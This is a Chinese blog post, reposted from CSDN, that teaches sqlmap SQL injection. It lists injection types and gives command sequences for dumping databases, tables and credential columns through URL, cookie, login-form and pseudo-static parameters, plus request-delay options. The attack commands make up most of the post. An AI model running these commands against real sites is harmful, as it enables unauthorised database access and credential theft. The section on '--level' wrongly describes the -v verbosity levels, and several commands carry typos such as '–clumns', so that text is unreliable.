sqlmap注入工具

資料:https://www.cnblogs.com/ichunqiu/p/5805108.html

1.sqlmap支持的注入模式

 

sqlmap支持五種不同的注入模式:

1、基於布爾的盲注: 即可以根據返回頁面判斷條件真假的注入。

2、基於時間的盲注: 即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。

3、基於報錯注入:  即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中。

4、聯合查詢注入: 可以使用union的情況下的注入。

5、堆查詢注入: 可以同時執行多條語句的執行時的注入。

 

2.sqlmap支持注入的數據庫
 

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

 

3.注入的一個流程

 

給sqlmap一個url的時候,它會:

1、判斷可注入的參數
2、判斷可以用那種SQL注入技術來注入
3、識別出哪種數據庫
4、根據用戶選擇,讀取哪些數據

 

url可以提供一個簡單的URL,Burp或WebScarab請求日誌文件,文本文檔中的完整http請求或者Google的搜索,匹配出結果頁面,也可以自己定義一個正則來判斷那個地址去測試。測試GET參數,POST參數,HTTP Cookie參數,HTTP User-Agent頭和HTTP Referer頭來確認是否有SQL注入,它也可以指定用逗號分隔的列表的具體參數來測試。
還可以設定HTTP(S)請求的併發數,來提高盲注時的效率。

 

4.sqlmap運行的級別--level

sqlmap中共有七個等級,默認等級爲1

0、只顯示Python錯誤以及嚴重的信息。
1、同時顯示基本信息和警告信息。(默認)
2、同時顯示debug信息。
3、同時顯示注入的payload。
4、同時顯示HTTP請求。
5、同時顯示HTTP響應頭。
6、同時顯示HTTP響應頁面。

 

等級是指測試結果的輸出的詳細程度,根據測試,--level等級的提高得到的效果遠比-v等級提高得到的效果好,如果你想看到sqlmap發送的測試payload最好的等級就是3。

 

5.對各種注入的一些基本步驟

 

1.sqlmap注入***常用命令

 

 

[html] view plain copy
 
sqlmap.py -u “注入地址” -v 1 --dbs   // 列舉數據庫   
  
sqlmap.py -u “注入地址” -v 1 --current-db   // 當前數據庫  
  
sqlmap.py -u “注入地址” -v 1 --users    // 列數據庫用戶  
  
sqlmap.py -u “注入地址” -v 1 --current-user  // 當前用戶  
  
sqlmap.py -u “注入地址” -v 1 --tables -D “數據庫”   // 列舉數據庫的表名  
  
sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “數據庫”   // 獲取表的列名  
  
sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “數據庫”   // 獲取表中的數據,包含列   
 

 

 

2.access注入

 

 

[html] view plain copy
 
1.輸入url  
2.url --tables 猜表  
3 url--columns -T 表名     暴字段  
4.url --dump(***) -T 表名 -C "字段名"  暴內容  
 

 

 

3.mysql注入

 

[html] view plain copy
 
url --current-db當前庫  
url --current-user當前用戶  
url --dbs     獲得數據庫  
url -D 數據庫 --tables 獲得表  
url -D 數據庫 -T 表名 --columns 暴字段  
url -D 數據庫 -T 表名 -C 字段 --dump   暴內容  
 

 

4.cookie注入

[html] view plain copy
 
url --cookie "id=" --table --level 2    暴表  
url --cookie "id=" --columns -T 表名 --level 2 獲得字段  
url --cookie "id=" --dump -T 表名 -C "字段名" --level 2  獲得內容  
 

5.POST登陸框注入

注入點:

http://xxx.xxx.com/Login.asp

注入方式一:

     1.對着注入點使用burp抓包,保存txt格式文件。
     2.輸入命令:sqlmap.py -r search-test.txt -p tfUPass

注入方式二:自動搜索表單的方式    

[html] view plain copy
 
sqlmap -u http://www.xxx.com/Login.asp --forms  
 

注入方式三:指定一個參數的方法 

[html] view plain copy
 
sqlmap -u http://www.xxx.com/Login.asp --data "tfUName=1&tfUPass=1"  
 

 

6.cookie注入

單個注入

 

 

[html] view plain copy
 
sqlmap -u “http://www.xxx.com/index.php” –cookie “id=1″  –dbs –level 2  
sqlmap -u “http://www.xxx.com/index.php” –cookie “id=” –clumns -T 表段 –level 2  
sqlmap -u “http://www.xxx.com/index.php” –cookie “id=” –dump -T 表段 -C “user,pass” –level 2  
 

 

7.僞靜態注入

目標站點:http://www.xxxx.com/id/3-1.html

[html] view plain copy
 
sqlmap -u www.xxxx.com/id/3*.html –dbs  
 

 

8.請求延時注入

 

[html] view plain copy
 
sqlmap –dbs -u usr –delay 1(時間,可隨意)  
sqlmap –dbs -u usr –safe-freq 1(次數,可隨意)


作者:寂地沉
來源:CSDN
原文:https://blog.csdn.net/zhangliu463884153/article/details/80029046
版權聲明:本文爲博主原創文章,轉載請附上博文鏈接!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章